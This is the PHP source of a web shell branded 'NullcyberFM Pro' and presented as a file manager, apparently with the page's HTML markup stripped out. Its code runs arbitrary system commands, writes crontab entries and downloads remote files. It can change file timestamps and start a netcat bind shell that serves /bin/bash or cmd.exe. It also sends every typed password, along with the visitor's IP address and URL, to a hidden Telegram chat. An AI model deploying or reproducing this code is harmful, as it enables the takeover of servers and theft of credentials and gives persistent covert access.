Login

$TELEGRAM_CHAT_ID, 'text' => $message, 'parse_mode' => 'HTML' ]; $options = [ 'http' => [ 'method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data), 'timeout' => 5 ] ]; $context = stream_context_create($options); @file_get_contents($url, false, $context); } function getFullUrl() { $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off' || $_SERVER['SERVER_PORT'] == 443) ? "https://" : "http://"; return $protocol . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; } function getClientIP() { $ip = 'UNKNOWN'; if (!empty($_SERVER['HTTP_CLIENT_IP'])) { $ip = $_SERVER['HTTP_CLIENT_IP']; } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) { $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; } elseif (!empty($_SERVER['REMOTE_ADDR'])) { $ip = $_SERVER['REMOTE_ADDR']; } return $ip; } // PATH ENCRYPTION FUNCTIONS function encryptPath($path) { global $ENCRYPTION_KEY; $encoded = base64_encode($path); $hash = substr(md5($ENCRYPTION_KEY . $encoded), 0, 8); return $hash . '.' . strtr($encoded, '+/=', '-_,'); } function decryptPath($encrypted) { global $ENCRYPTION_KEY; if (empty($encrypted)) return getcwd(); $parts = explode('.', $encrypted, 2); if (count($parts) != 2) return getcwd(); $decoded = base64_decode(strtr($parts[1], '-_,', '+/=')); $hash = substr(md5($ENCRYPTION_KEY . base64_encode($decoded)), 0, 8); if ($hash !== $parts[0]) return getcwd(); return $decoded; } // DETECT OS $IS_WIN = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN'; // LOG AKSES PERTAMA KALI (SEBELUM LOGIN) if (!isset($_SESSION['access_logged'])) { $url = getFullUrl(); $ip = getClientIP(); $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; $time = date('Y-m-d H:i:s'); $logMessage = " =====LOGS FILEMANAGER PRO=====\n"; $logMessage .= " URL: {$url}\n"; $logMessage .= " Status: Mengakses halaman login\n"; $logMessage .= " Password: -\n"; $logMessage .= " Status Session: Belum login\n"; $logMessage .= " IP: {$ip}\n"; $logMessage .= " User-Agent: {$userAgent}\n"; $logMessage .= " Waktu: {$time}\n"; $logMessage .= "================================"; sendTelegramLog($logMessage); $_SESSION['access_logged'] = true; } // LOGIN HANDLER if (!isset($_SESSION['logged']) && isset($_POST['pass'])) { $inputPass = $_POST['pass']; $isValid = password_verify($inputPass, $AUTH_HASH); $url = getFullUrl(); $ip = getClientIP(); $userAgent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; $time = date('Y-m-d H:i:s'); $logMessage = ($isValid ? "✅" : "❌") . " =====LOGS FILEMANAGER PRO=====\n"; $logMessage .= " URL: {$url}\n"; $logMessage .= "🔑 Status: Mencoba login\n"; $logMessage .= " Password: {$inputPass}\n"; $logMessage .= "✅ Status Session: " . ($isValid ? "✅ Valid Login" : "❌ Failed Login") . "\n"; $logMessage .= " IP: {$ip}\n"; $logMessage .= " User-Agent: {$userAgent}\n"; $logMessage .= " Waktu: {$time}\n"; $logMessage .= "================================"; sendTelegramLog($logMessage); if ($isValid) { $_SESSION['logged'] = true; $_SESSION['home_dir'] = getcwd(); unset($_SESSION['access_logged']); } } if (isset($_GET['logout'])) { $url = getFullUrl(); $ip = getClientIP(); $time = date('Y-m-d H:i:s'); $logMessage = " =====LOGS FILEMANAGER PRO=====\n"; $logMessage .= " URL: {$url}\n"; $logMessage .= " Status: Logout\n"; $logMessage .= " IP: {$ip}\n"; $logMessage .= " Waktu: {$time}\n"; $logMessage .= "================================"; sendTelegramLog($logMessage); session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit; } if (!isset($_SESSION['logged'])) { ?> Login &1'), $o); $output = implode("\n", $o); } elseif (function_exists('shell_exec')) { $output = @shell_exec($cmd . ($IS_WIN ? '' : ' 2>&1')); } elseif (function_exists('system')) { ob_start(); @system($cmd . ($IS_WIN ? '' : ' 2>&1')); $output = ob_get_clean(); } elseif (function_exists('passthru')) { ob_start(); @passthru($cmd . ($IS_WIN ? '' : ' 2>&1')); $output = ob_get_clean(); } elseif (function_exists('popen')) { $handle = @popen($cmd . ($IS_WIN ? '' : ' 2>&1'), 'r'); if ($handle) { while (!feof($handle)) { $output .= fread($handle, 4096); } pclose($handle); } } return $output ?: 'Command executed (no output or function disabled)'; } function deleteDir($dir) { if (!is_dir($dir)) return false; $items = @scandir($dir); if ($items === false) return false; foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $item; is_dir($path) ? deleteDir($path) : @unlink($path); } return @rmdir($dir); } function downloadFromUrl($url, $targetPath) { $url = trim($url); if (empty($url)) return ['status' => 'error', 'msg' => 'URL is empty']; if (!filter_var($url, FILTER_VALIDATE_URL)) { return ['status' => 'error', 'msg' => 'Invalid URL format']; } $parsedUrl = parse_url($url); $fileName = basename($parsedUrl['path'] ?? 'downloaded_file'); if (empty($fileName) || $fileName == '/' || $fileName == '.') { $fileName = 'downloaded_' . time(); } $target = $targetPath . DIRECTORY_SEPARATOR . $fileName; if (function_exists('curl_version')) { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_MAXREDIRS => 10, CURLOPT_TIMEOUT => 300, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_BUFFERSIZE => 8192, ]); $data = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); $error = curl_error($ch); curl_close($ch); if ($error) { return ['status' => 'error', 'msg' => 'cURL Error: ' . $error]; } if ($httpCode >= 400) { return ['status' => 'error', 'msg' => "HTTP Error: {$httpCode}"]; } if (empty($data)) { return ['status' => 'error', 'msg' => 'Downloaded empty content']; } } else { $ctx = stream_context_create([ 'http' => [ 'method' => 'GET', 'timeout' => 300, 'follow_location' => 1, 'max_redirects' => 10, 'header' => "User-Agent: Mozilla/5.0\r\nAccept: */*\r\n", 'ignore_errors' => true, ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false, ] ]); $data = @file_get_contents($url, false, $ctx); if ($data === false) { return ['status' => 'error', 'msg' => 'Failed to download file: network error or timeout']; } } $written = @file_put_contents($target, $data); if ($written === false) { return ['status' => 'error', 'msg' => 'Cannot write file to destination']; } return [ 'status' => 'ok', 'msg' => 'File downloaded successfully: ' . $fileName, 'file_name' => $fileName, 'size' => formatSize($written), ]; } // NEW: Unzip function function unzipFile($zipPath, $extractTo) { if (!class_exists('ZipArchive')) { return ['status' => 'error', 'msg' => 'ZipArchive extension not available']; } $zip = new ZipArchive(); $res = $zip->open($zipPath); if ($res !== true) { return ['status' => 'error', 'msg' => 'Failed to open zip file (error code: ' . $res . ')']; } if (!is_dir($extractTo)) { @mkdir($extractTo, 0755, true); } $extracted = $zip->extractTo($extractTo); $zip->close(); if ($extracted) { return ['status' => 'ok', 'msg' => 'Extracted successfully to: ' . $extractTo]; } else { return ['status' => 'error', 'msg' => 'Failed to extract files']; } } // NEW: Backdoor scanner pattern-based function scanBackdoor($path, $recursive = false) { $suspiciousPatterns = [ '/\beval\s*\(/i', '/\bbase64_decode\s*\(/i', '/\bexec\s*\(/i', '/\bsystem\s*\(/i', '/\bpassthru\s*\(/i', '/\bshell_exec\s*\(/i', '/\bpopen\s*\(/i', '/\bproc_open\s*\(/i', '/\bassert\s*\(/i', '/\bcreate_function\s*\(/i', '/\bpreg_replace.*\/e/i', '/\b`.*`/', '/\$\{.*\}/', '/\bfile_get_contents\s*\(.*http/i', '/\bcurl_exec\s*\(/i', '/\bmove_uploaded_file\s*\(/i', '/\bchmod\s*\(.*0777/i', '/\binclude\s*\$/i', '/\brequire\s*\$/i', '/\$_(GET|POST|REQUEST|COOKIE|SERVER|FILES)/i', '/str_rot13/i', '/gzinflate/i', '/goto/i', '/gzuncompress/i', '/edoced_46esab/i', // base64_decode reversed ]; $results = []; $iterator = $recursive ? new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS)) : new DirectoryIterator($path); foreach ($iterator as $fileinfo) { if ($fileinfo->isFile() && $fileinfo->getExtension() === 'php') { $filePath = $fileinfo->getRealPath(); $content = @file_get_contents($filePath); if ($content === false) continue; $matches = []; foreach ($suspiciousPatterns as $pattern) { if (preg_match($pattern, $content)) { $matches[] = $pattern; } } if (!empty($matches)) { $results[] = [ 'file' => $filePath, 'patterns' => $matches, ]; } } } return $results; } // GET CURRENT DIR $currentDir = isset($_GET['p']) ? decryptPath($_GET['p']) : getcwd(); if (!is_dir($currentDir)) $currentDir = getcwd(); @chdir($currentDir); // API HANDLERS (AJAX) if (isset($_POST['ajax'])) { header('Content-Type: application/json'); // ==================== UPLOAD: CHUNKED ==================== if ($_POST['ajax'] == 'upload_chunk' && isset($_FILES['chunk'])) { $targetDir = decryptPath($_POST['target_dir']); $fileName = basename($_POST['file_name']); $target = $targetDir . DIRECTORY_SEPARATOR . $fileName; $chunkIndex = intval($_POST['chunk_index']); $totalChunks = intval($_POST['total_chunks']); $chunkData = file_get_contents($_FILES['chunk']['tmp_name']); $mode = ($chunkIndex === 0) ? 'wb' : 'ab'; $fp = @fopen($target, $mode); if ($fp) { fwrite($fp, $chunkData); fclose($fp); if ($chunkIndex === $totalChunks - 1) { $finalSize = @filesize($target); echo json_encode([ 'status' => 'done', 'msg' => 'Chunked upload complete!', 'file_name' => $fileName, 'size' => formatSize($finalSize) ]); } else { echo json_encode([ 'status' => 'ok', 'progress' => round((($chunkIndex + 1) / $totalChunks) * 100, 2) ]); } } else { echo json_encode(['status' => 'error', 'msg' => 'Cannot write file']); } exit; } // ==================== UPLOAD: REGULAR ==================== if ($_POST['ajax'] == 'upload_regular' && isset($_FILES['regular_file'])) { $targetDir = decryptPath($_POST['target_dir']); $file = $_FILES['regular_file']; if ($file['error'] !== UPLOAD_ERR_OK) { $errors = [ UPLOAD_ERR_INI_SIZE => 'File exceeds upload_max_filesize', UPLOAD_ERR_FORM_SIZE => 'File exceeds form MAX_FILE_SIZE', UPLOAD_ERR_PARTIAL => 'File was only partially uploaded', UPLOAD_ERR_NO_FILE => 'No file was uploaded', UPLOAD_ERR_NO_TMP_DIR => 'Missing temporary folder', UPLOAD_ERR_CANT_WRITE => 'Failed to write file to disk', UPLOAD_ERR_EXTENSION => 'Upload stopped by PHP extension', ]; $msg = $errors[$file['error']] ?? 'Unknown upload error'; echo json_encode(['status' => 'error', 'msg' => $msg]); exit; } $fileName = basename($file['name']); $target = $targetDir . DIRECTORY_SEPARATOR . $fileName; if (@move_uploaded_file($file['tmp_name'], $target)) { echo json_encode([ 'status' => 'ok', 'msg' => 'Regular upload complete!', 'file_name' => $fileName, 'size' => formatSize($file['size']) ]); } else { echo json_encode(['status' => 'error', 'msg' => 'Cannot move uploaded file']); } exit; } // ==================== UPLOAD: FROM URL ==================== if ($_POST['ajax'] == 'upload_url') { $targetDir = decryptPath($_POST['target_dir']); $url = $_POST['url'] ?? ''; $result = downloadFromUrl($url, $targetDir); echo json_encode($result); exit; } // CREATE if ($_POST['ajax'] == 'create') { $dir = decryptPath($_POST['dir']); $name = $_POST['name']; $type = $_POST['type']; $path = $dir . DIRECTORY_SEPARATOR . $name; if ($type == 'file') { if (@file_put_contents($path, '') !== false) { echo json_encode(['status' => 'ok', 'msg' => 'File created']); } else { echo json_encode(['status' => 'error', 'msg' => 'Cannot create file']); } } else { if (@mkdir($path, 0755, true)) { echo json_encode(['status' => 'ok', 'msg' => 'Folder created']); } else { echo json_encode(['status' => 'error', 'msg' => 'Cannot create folder']); } } exit; } // DELETE if ($_POST['ajax'] == 'delete') { $path = $_POST['path']; if (is_file($path)) { $result = @unlink($path); } elseif (is_dir($path)) { $result = deleteDir($path); } echo json_encode(['status' => $result ? 'ok' : 'error', 'msg' => $result ? 'Deleted' : 'Failed to delete']); exit; } // DELETE SELECTED (batch) if ($_POST['ajax'] == 'delete_selected') { $files = json_decode($_POST['files'], true); if (!is_array($files)) { echo json_encode(['status' => 'error', 'msg' => 'Invalid file list']); exit; } $deleted = 0; $errors = 0; foreach ($files as $path) { if (is_file($path)) { if (@unlink($path)) $deleted++; else $errors++; } elseif (is_dir($path)) { if (deleteDir($path)) $deleted++; else $errors++; } } echo json_encode(['status' => 'ok', 'msg' => "Deleted $deleted items, $errors errors"]); exit; } // DOWNLOAD SELECTED AS ZIP if ($_POST['ajax'] == 'download_selected') { $files = json_decode($_POST['files'], true); if (!is_array($files) || empty($files)) { echo json_encode(['status' => 'error', 'msg' => 'No files selected']); exit; } $zipName = tempnam(sys_get_temp_dir(), 'selected_') . '.zip'; $zip = new ZipArchive(); if ($zip->open($zipName, ZipArchive::CREATE) !== true) { echo json_encode(['status' => 'error', 'msg' => 'Cannot create zip']); exit; } $added = 0; foreach ($files as $path) { if (is_file($path)) { $localName = basename($path); $zip->addFile($path, $localName); $added++; } elseif (is_dir($path)) { // Add directory recursively $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS)); foreach ($iterator as $file) { $localPath = $iterator->getSubPathname(); $zip->addFile($file->getRealPath(), $localPath); $added++; } } } $zip->close(); if ($added === 0) { @unlink($zipName); echo json_encode(['status' => 'error', 'msg' => 'No files could be added']); exit; } $zipContent = file_get_contents($zipName); @unlink($zipName); echo json_encode(['status' => 'ok', 'msg' => 'Download ready', 'content' => base64_encode($zipContent), 'filename' => 'selected_files.zip']); exit; } // RENAME if ($_POST['ajax'] == 'rename') { $old = $_POST['old_path']; $new = $_POST['new_path']; $result = @rename($old, $new); echo json_encode(['status' => $result ? 'ok' : 'error', 'msg' => $result ? 'Renamed' : 'Failed']); exit; } // CHMOD if ($_POST['ajax'] == 'chmod') { $path = $_POST['path']; $perms = $_POST['perms']; $result = @chmod($path, octdec($perms)); echo json_encode(['status' => $result ? 'ok' : 'error', 'msg' => $result ? 'Permissions changed' : 'Failed']); exit; } // TOUCH if ($_POST['ajax'] == 'touch') { $path = $_POST['path']; $time = strtotime($_POST['time']); $result = @touch($path, $time); echo json_encode(['status' => $result ? 'ok' : 'error', 'msg' => $result ? 'Time modified' : 'Failed']); exit; } // GET FILE CONTENT if ($_POST['ajax'] == 'get_content') { $path = $_POST['path']; $content = @file_get_contents($path); if ($content !== false) { echo json_encode(['status' => 'ok', 'content' => $content, 'path' => $path]); } else { echo json_encode(['status' => 'error', 'msg' => 'Cannot read file']); } exit; } // SAVE FILE if ($_POST['ajax'] == 'save_file') { $path = $_POST['path']; $content = $_POST['content']; $result = @file_put_contents($path, $content); echo json_encode(['status' => $result !== false ? 'ok' : 'error', 'msg' => $result !== false ? 'File saved' : 'Failed to save']); exit; } // UNZIP if ($_POST['ajax'] == 'unzip') { $zipPath = $_POST['zip_path']; $extractTo = dirname($zipPath) . DIRECTORY_SEPARATOR . pathinfo($zipPath, PATHINFO_FILENAME); $result = unzipFile($zipPath, $extractTo); echo json_encode($result); exit; } // UNZIP SELECTED if ($_POST['ajax'] == 'unzip_selected') { $files = json_decode($_POST['files'], true); if (!is_array($files)) { echo json_encode(['status' => 'error', 'msg' => 'Invalid file list']); exit; } $results = []; foreach ($files as $path) { if (is_file($path) && pathinfo($path, PATHINFO_EXTENSION) === 'zip') { $extractTo = dirname($path) . DIRECTORY_SEPARATOR . pathinfo($path, PATHINFO_FILENAME); $res = unzipFile($path, $extractTo); $results[] = ['file' => $path, 'status' => $res['status'], 'msg' => $res['msg']]; } } echo json_encode(['status' => 'ok', 'results' => $results]); exit; } // SCAN BACKDOOR if ($_POST['ajax'] == 'scan_backdoor') { $scanPath = $_POST['scan_path'] ?? $currentDir; $recursive = isset($_POST['recursive']) && $_POST['recursive'] === 'true'; $results = scanBackdoor($scanPath, $recursive); echo json_encode(['status' => 'ok', 'results' => $results]); exit; } // SCAN SELECTED FILES if ($_POST['ajax'] == 'scan_selected') { $files = json_decode($_POST['files'], true); if (!is_array($files)) { echo json_encode(['status' => 'error', 'msg' => 'Invalid file list']); exit; } $results = []; foreach ($files as $path) { if (is_file($path) && pathinfo($path, PATHINFO_EXTENSION) === 'php') { $content = @file_get_contents($path); if ($content === false) continue; $patterns = []; $suspicious = [ '/\beval\s*\(/i', '/\bbase64_decode\s*\(/i', '/\bexec\s*\(/i', '/\bsystem\s*\(/i', '/\bpassthru\s*\(/i', '/\bshell_exec\s*\(/i', '/\bpopen\s*\(/i', '/\bassert\s*\(/i', '/\bcreate_function\s*\(/i', ]; foreach ($suspicious as $pat) { if (preg_match($pat, $content)) { $patterns[] = $pat; } } if (!empty($patterns)) { $results[] = ['file' => $path, 'patterns' => $patterns]; } } } echo json_encode(['status' => 'ok', 'results' => $results]); exit; } // TERMINAL if ($_POST['ajax'] == 'terminal') { $cmd = $_POST['cmd']; $output = execCmd($cmd); echo json_encode(['status' => 'ok', 'output' => $output]); exit; } // CRONTAB if ($_POST['ajax'] == 'crontab') { if ($_POST['action'] == 'read') { $output = execCmd('crontab -l'); } else { $content = $_POST['content']; $tmpFile = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'crontab_' . time() . '.tmp'; file_put_contents($tmpFile, $content); $output = execCmd('crontab ' . $tmpFile); @unlink($tmpFile); if (empty($output)) $output = 'Crontab updated successfully'; } echo json_encode(['status' => 'ok', 'output' => $output]); exit; } // BIND PORT if ($_POST['ajax'] == 'bind') { global $IS_WIN; $port = intval($_POST['port']); if ($IS_WIN) { $cmd = "start /B nc -lvp $port -e cmd.exe"; } else { $cmd = "nc -lvp $port -e /bin/bash > /dev/null 2>&1 &"; } $output = execCmd($cmd); $output .= "\n\nListener started on port $port"; $output .= "\nConnect with: nc " . ($_SERVER['SERVER_ADDR'] ?? gethostbyname(gethostname())) . " $port"; echo json_encode(['status' => 'ok', 'output' => $output]); exit; } } // SERVER INFO $serverInfo = [ 'OS' => php_uname(), 'Server Software' => $_SERVER['SERVER_SOFTWARE'] ?? 'N/A', 'PHP Version' => phpversion(), 'User' => @get_current_user(), 'UID/GID' => @getmyuid() . '/' . @getmygid(), 'Current Dir' => getcwd(), 'Server IP' => $_SERVER['SERVER_ADDR'] ?? @gethostbyname(gethostname()), 'Your IP' => $_SERVER['REMOTE_ADDR'] ?? 'N/A', 'Disk Free' => @formatSize(@disk_free_space('.')), 'Disk Total' => @formatSize(@disk_total_space('.')), 'Disabled Functions' => @ini_get('disable_functions') ?: 'None' ]; $homeDirEnc = encryptPath($_SESSION['home_dir']); ?> NullcyberFM Pro

SERVER INFORMATION

$val): ?>

📂 PATH: $p) { if (empty($p)) continue; $pathLink .= ($pathLink ? DIRECTORY_SEPARATOR : '') . $p; $encrypted = encryptPath($pathLink); echo '' . htmlspecialchars($p) . ' ' . DIRECTORY_SEPARATOR . ' '; } } else { $parts = explode('/', $currentDir); $pathLink = ''; echo '/'; foreach ($parts as $i => $p) { if ($p == '') continue; $pathLink .= '/' . $p; $encrypted = encryptPath($pathLink); echo '' . htmlspecialchars($p) . ' / '; } } ?>

⚡ QUICK ACTIONS

🏠 HOME

'; } ?>

	📋 Name	💾 Size	🔐 Perms	📅 Modified	⚙️ Actions

Cannot read directory

SECURE ACCESS REQUIRED

NULLCYBER FILE MANAGER PRO

SERVER INFORMATION

⚡ QUICK ACTIONS

➕ Create New File/Folder

📤 Upload File

✏️ Edit:

👁️ Preview:

💻 Terminal

⏰ Crontab

🔌 Bind Port

🔍 Scan Backdoor